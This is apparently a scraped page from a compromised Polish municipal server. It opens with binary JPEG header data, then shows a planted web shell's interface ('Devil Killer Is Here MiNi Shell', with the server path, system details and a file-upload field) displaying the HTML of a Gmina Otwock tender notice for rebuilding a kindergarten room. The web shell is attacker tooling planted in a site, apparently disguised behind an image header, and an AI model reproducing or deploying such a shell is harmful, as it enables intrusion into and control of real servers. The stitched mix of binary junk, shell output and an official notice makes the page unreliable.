JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230830/0037375701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa budynku handlowo-usługowego <br/>(istniejące Przedszkole nr 12 zlokalizowane na II kondygnacji) <br/>przy ul. Batorego 34 w Otwocku. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Otwock</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013268770</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@otwock.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.otwock.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa budynku handlowo-usługowego <br/>(istniejące Przedszkole nr 12 zlokalizowane na II kondygnacji) <br/>przy ul. Batorego 34 w Otwocku. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1f78db3f-432c-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00373757</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://otwock.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja za pośrednictwem Platformy Zamawiającego<br/>https://otwock.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu<br/>Zamawiający dopuszcza możliwość przekazywania sobie przez strony<br/>postępowania oświadczeń, wniosków, zawiadomień oraz informacji:1.1. Elektronicznie za pośrednictwem Platformy znajdującej się<br/>pod adresem: https://otwock.ezamawiajacy.pl w zakładce„Korespondencja”.2. Ogólne zasady korzystania z Platformy,<br/>;2.1.zgłoszenie do postępowania<br/>wymaga zalogowania Wykonawcy do Systemu na subdomenie Miasto Otwock ;<br/>https://otwock.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl.2.2. Wykonawca po wybraniu opcji „przystąp do postępowania”<br/>zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e -mail, ustanawia hasło, następnie powtarza<br/>hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. 2.3. Rejestracja Wykonawcy trwa maksymalnie<br/>do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w<br/>procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informacje, o możliwości<br/>przyspieszenia procedury założenia konta, wówczas<br/>należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu. 2.4.Po założeniu konta Wykonawca ma możliwość<br/>złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/>Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.3.Zamawiający zgodnie określa dopuszczalny format podpisu elektronicznego, jako:3.1. dokumenty w formacie<br/>„pdf&#34; zaleca się podpisywać formatem PAdES,3.2. dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie<br/>wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu<br/>oddzielny plik z podpisem.4.Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB wtxt,<br/>rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg,wav, mp3, avi, mpg, mpeg, mp4, m4a,<br/>mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd,gml, rng, xsl, xslt,TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>5. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:5.1. Plik załączony przez Wykonawcę na<br/>Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8.Możliwość otworzenia<br/>pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.6. Oznaczenie czasu odbioru<br/>danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZP.271.48.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1. Przedmiot zamówienia realizowany będzie:<br/>1) na podstawie decyzji Starosty Otwockiego nr 1265/2022 z 15.11.2022 r. zatwierdzającej projekt zagospodarowania działki<br/>lub terenu i projekt architektoniczno-budowlany oraz udzielającej pozwolenia na budowę;<br/>2) zgodnie z dokumentacją projektową: „Przebudowa budynku handlowo – usługowego (istniejące przedszkole<br/>zlokalizowane na II kondygnacji)”, na którą składają się:<br/>a. projekt zagospodarowania terenu;<br/>b. projekt architektoniczno-budowlany;<br/>c. projekt techniczny branż: architektoniczno-konstrukcyjnej, sanitarnej, elektrycznej;<br/>d. specyfikację wykonania i odbioru robót;<br/>3) zgodnie z Opisem Przedmiotu Zamówienia, dalej również OPZ.<br/>3.2. Przedmiotem zamierzenia budowlanego objętego niniejszą dokumentacją jest przebudowa i zmiana sposobu<br/>użytkowania jednego pomieszczenia Przedszkola nr 12, ul. Batorego 34 w Otwocku, w tym, w szczególności:<br/>1) wykonanie wszystkich czynności związanych z wykonaniem obiektu zgodnie z dokumentacją projektową i OPZ;<br/>2) realizacja wszystkich czynności administracyjnych związanych z prawidłową i zgodną z przepisami prawa realizacją<br/>przedmiotu umowy po otrzymaniu odpowiedniego Pełnomocnictwa od Zamawiającego;<br/>3) wykonanie dokumentacji powykonawczej;<br/>4) udzielenie gwarancji, na warunkach określonych w § 12 umowy; na roboty budowlane i dostarczone oraz zainstalowane<br/>elementy w ramach realizacji przedmiotu umowy;<br/>5) wykonanie wszelkich czynności i działań niezbędnych do uzyskania pozwoleń, odbiorów;<br/>6) uzyskanie pozwolenie na użytkowanie;<br/>7) przekazanie przedmiot umowy do eksploatacji;<br/>8) przeprowadzenie niezbędnych szkoleń użytkownika i Zamawiającego.<br/>3.3. W przypadku wystąpienia rozbieżności pomiędzy różnymi częściami dokumentacji projektowej, przedmiarem,<br/>specyfikacji technicznych lub Specyfikacji Warunków Zamówienia obowiązywać będzie najszerszy zakres robót.<br/>3.4.<br/>1. Zakres przedmiotu umowy obejmuje, w szczególności:<br/>1) wykonanie wszystkich czynności, w tym robót budowlanych, związanych z wykonaniem obiektu zgodnie z dokumentacją<br/>projektową i OPZ;<br/>2) realizację wszystkich czynności administracyjnych związanych z prawidłową i zgodną z przepisami prawa realizacją<br/>przedmiotu umowy po otrzymaniu odpowiedniego Pełnomocnictwa od Zamawiającego;<br/>3) wykonanie dokumentacji powykonawczej;<br/>4) udzielenie gwarancji, na warunkach określonych w § 12 umowy; na roboty budowlane i dostarczone oraz zainstalowane<br/>elementy w ramach realizacji przedmiotu umowy;<br/>5) wykonanie wszelkich czynności i działań niezbędnych do uzyskania pozwoleń, odbiorów;<br/>6) uzyskanie pozwolenie na użytkowanie;<br/>7) przekazanie przedmiot umowy do eksploatacji;<br/>8) przeprowadzenie niezbędnych szkoleń użytkownika i Zamawiającego.<br/>2. Warunki realizacji:<br/>1) Roboty będą wykonywane w następujących dniach tygodnia i godzinach:<br/>a) w zakresie robót instalacyjno-budowlanych, których wykonywanie nie będzie powodować wystąpienia jakichkolwiek<br/>uciążliwości dla użytkowników obiektu – we wszystkie dni z terminu przewidzianego na ich realizację (dni robocze, soboty,<br/>niedziele i święta);<br/>b) roboty uciążliwe (powodujące: nadmierny hałas, zapylenie - kurz budowlany, mogą być wykonywane tylko po godzinach<br/>pracy przedszkola (tj. po 17:00) w dni robocze oraz we wszystkich godzinach w pozostałe dni, lecz zawsze po<br/>wcześniejszym pisemnym ich uzgodnieniu z użytkownikiem i zarządcą obiektu,<br/>c) roboty elektryczne powodujące wystąpienie zakłóceń i przerw w zasilaniu elektrycznym dla pomieszczeń i budynków –<br/>tylko w uzgodnione pisemnie z Zamawiającym/użytkownikiem/zarządcą obiektu w weekendy (sobota, niedziela), przy<br/>spełnieniu odrębnie ustalonych warunków;<br/>2) Nie jest dopuszczalne prowadzenie jakichkolwiek prac powodujących przerwy i zakłócenia w zasilaniu elektrycznym dla<br/>rozdzielni głównych w budynku objętym robotami budowlanymi w dni robocze (od poniedziałku do piątku w godzinach 6:00 –<br/>17:00) bez pisemnego uzgodnienia z Zamawiającym/użytkownikiem/zarządcą obiektu.<br/>3) Plac budowy, będzie wymagał oznakowania ostrzegawczego i oznakowania wynikającego z przepisów, a w razie<br/>potrzeby również wygrodzenia<br/>4) Ze względu na czynny charakter obiektu i jego specyfikę (obiekt użyteczności publicznej, placówka oświatowa) mogą<br/>wystąpić przerwy w realizacji prac, zarówno kilkugodzinne, jak i całodobowe, które może zarządzić Zamawiający lub osoby<br/>przez niego wyznaczone, a zarządzenie przerwy może nastąpić ustnie, w sposób nagły, bez wyprzedzającej informacji. W<br/>przypadku braku możliwości prowadzenia jakichkolwiek robót w związku z sytuacją opisaną powyżej, Wykonawcy nie<br/>przysługuje roszczenie finansowe z tego tytułu<br/>5) W związku z koniecznością zapewnienia prawidłowego, ciągłego funkcjonowania przedszkola wszelkie roboty budowlano<br/>- instalacyjne związane z realizacją przedmiotu umowy wymagające działań poza nowobudowaną salą nr 5 będą<br/>zakończone w terminie 1 miesiąca podpisania umowy i prowadzone w godzinach braku obecności dzieci w placówce.<br/>3. W ramach realizacji przedmiotu umowy Wykonawca zobowiązany jest do kompleksowego wykonania robót zgodnie z dokumentacją projektową i OPZ, w szczególności:<br/>1) modernizacji instalacji ochrony ppoż w pomieszczeniach przedszkola (wiatrołapie, komunikacji, szatni, salach zajęć),<br/>poprzez instalację opraw awaryjnego oświetlenia ewakuacyjnego,<br/>2) wyposażenia przedszkola w przeciwpożarowy wyłącznik prądu,<br/>3) wykonania zadaszenia nad schodami ewakuacyjnymi,<br/>4) wykonania więźby dachowej i ścian konstrukcyjnych,<br/>5) wykonania obróbki blacharskiej;<br/>6) wykonania instalacji grzewczej wraz z dostawą i montażem grzejników;<br/>7) wykonania instalacji elektrycznej wraz z dostawą i montażem osprzętu i oświetlenia;<br/>8) dostawy i montażu stolarki drzwiowej i okiennej wraz z wykonaniem glifów i ich wykończeniem:<br/>• konieczne wykonanie parapetów nowych okien<br/>• konieczne zaopatrzenie wszystkich drzwi w stosowne dla typu i lokalizacji: progi, odbojniki, klamki oraz zamki<br/>umożliwiające zamknięcie drzwi na klucz (kolorystyka i typ do uzgodnienia z Zamawiającym), komplet kluczy zostanie<br/>przekazany przez Wykonawcę, Zamawiającemu;<br/>9) wykonania robót wykończeniowych wybudowanej sali, w tym:<br/>a) wykonanie, wykończenie i malowanie ścian wewnętrznych i sufitów farbą lateksową ścian,<br/>b) wykonanie wykończenia podłogi za pomocą wykładziny z wierzchnią warstwą użytkową PCV, sportowej/wielofunkcyjnej w<br/>kolorze uzgodnionym z Zamawiającym, spełniającej następujące parametry:<br/>• klasa odporności na ogień wg EN 13501-1 – co najmniej niezapalny Cfl-s1, Bfl-s1,<br/>• grubość 6,20 mm,<br/>• amortyzacja kategoria P1,<br/>• antypoślizgowa,<br/>• odporna na ścieranie,<br/>• odporna na obciążenia toczne,<br/>• izolacja akustyczna co najmniej 18 db<br/>• odporna na plamy.<br/>Cokoły wykonane na wysokość 10 cm powyżej poziomu posadzki. Pomiędzy poziomem podłogi, a cokołem zapewnić<br/>połączenie bezspoinowe;<br/>c) wykonanie wszelkich robót wykończeniowych i poinstalacyjnych.<br/>10) usunięcia zbędnej infrastruktury, transport i jej utylizację;<br/>11) dostawy i instalacji oświetlenia w suficie, niezbędnego osprzętu elektrycznego gniazdek, włączników itp;<br/>12) wszystkie instalacje sanitarne, elektryczne, teletechniczne musza zostać zintegrowane i włączone do istniejącej w<br/>obiekcie infrastruktury w porozumieniu i przy asyście administratora obiektu.<br/>4. Zamawiający wymaga poprowadzenia wszelkich instalacji podtynkowo, w bruzdach pod posadzką lub w przestrzeni sufitu<br/>podwieszanego, jedynie w uzasadnionych technicznie przypadkach i zgodnie ze wskazaniami dokumentacji projektowej<br/>dopuszczalne jest inne wykonanie instalacji i poprowadzenie okablowania.<br/>5. Zamawiający wymaga aby każde naroże ścienne wykończone tynkami zostało zabezpieczone stalowymi narożnikami<br/>podtynkowymi.<br/>6. Wykonawca zobowiązany jest do sporządzenia dokumentacji powykonawczej, która musi zostać dostarczona<br/>Zamawiającemu i zatwierdzenia przez inspektora nadzoru inwestorskiego przed rozpoczęciem odbioru końcowego.<br/>Do odbioru końcowego Wykonawca jest zobowiązany przygotować dokumentację powykonawczą w 3 egzemplarzach w<br/>wersji papierowej oraz w 2 egzemplarzach w wersji elektronicznej obejmującej: całość dokumentacji w formie pliku pdf (w<br/>tym skan całości) oraz w postaci plików umożliwiających edycję dokumentacji z rozszerzeniem doc, dwg) zawierającą:<br/>a) kopie rysunków wchodzące w skład zatwierdzonego projektu budowlanego z naniesionymi zmianami (a w razie potrzeby<br/>także opis uzupełniający) dokonanymi przez projektanta (o ile zmiany wystąpią w stosunku do projektu budowlanego);<br/>b) protokoły z prób, badań i pomiarów we wszystkich branżach;<br/>c) instrukcje obsługi, eksploatacji, konserwacji dla urządzeń;<br/>d) szczegółową specyfikację techniczną wykonania i odbioru robót,<br/>e) dziennik budowy,<br/>f) recepty i ustalenia technologiczne,<br/>g) wyniki pomiarów kontrolnych oraz badań i oznaczeń laboratoryjnych, atesty jakościowe wbudowanych materiałów,<br/>h) certyfikaty, świadectwa i aprobaty techniczne, deklaracje zgodności użytych materiałów i wykonanych robót;<br/>i) niezbędne protokoły odbiorów dokonane przez inne jednostki,<br/>j) geodezyjną inwentaryzację powykonawczą,<br/>k) kopię mapy zasadniczej powstałej w wyniku geodezyjnej inwentaryzacji powykonawczej,<br/>l) DTR (dokumentacje techniczno-ruchowe), gwarancje, instrukcje na zamontowane urządzenia, potwierdzające osiągnięcie<br/>zakładanych projektowo parametrów i wydajności,<br/>m) warunki gwarancji Wykonawcy zgodnie z § 12 umowy dla dostarczonych elementów i urządzeń oraz wykonanej<br/>dokumentacji i wykonanych robót w ramach realizacji przedmiotu umowy;<br/>n) komplet licencji na oprogramowania systemu operacyjnego i/lub oprogramowania użytkowe (o ile wystąpią);<br/>o) komplet haseł, zapewniających pełną sterowność i dostęp do oprogramowań na poziomie użytkownika oraz<br/>administratora (o ile wystąpią);<br/>p) listę osób, które będą wykonywały czynności serwisowo-gwarancyjne w okresie udzielonej gwarancji, a następnie jej<br/>aktualizacja minimum raz na kwartał,<br/>q) inne dokumenty wskazane w umowie.<br/>(...) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">98 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje udzielanie zamówień, o których mowa w art. 305 pkt 1) w związku z art. 214 ust. 1 pkt. 7 o wartości netto: do kwoty 175<br/>000,00 zł., w zakresie polegającym na powtórzeniu podobnych rodzajowo prac zgodnych z przedmiotem zamówienia<br/>podstawowego, w tym pozostających w zgodności z podstawowym zamierzeniem budowlanym oraz związanym bezpośrednio przez<br/>identyfikację zamówienia z realizacją podstawowego zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, spełniają następujące warunki w postępowaniu:<br/><br/>1) nie podlegają wykluczeniu - z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których<br/>zachodzi którakolwiek z okoliczności wskazanych: w art. 108 ust. 1 oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r.<br/>o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego,<br/><br/>2) którzy spełniają warunki dotyczące: zdolności technicznej lub zawodowej:<br/><br/>a) Wykonawca spełni warunek, jeżeli wykaże, że dysponuje/będzie dysponował<br/>co najmniej 1 osobą, która będzie uczestniczyć w wykonaniu zamówienia<br/>na stanowisku kierownika robót, posiadającą:<br/><br/>• ważne uprawnienia budowlane do 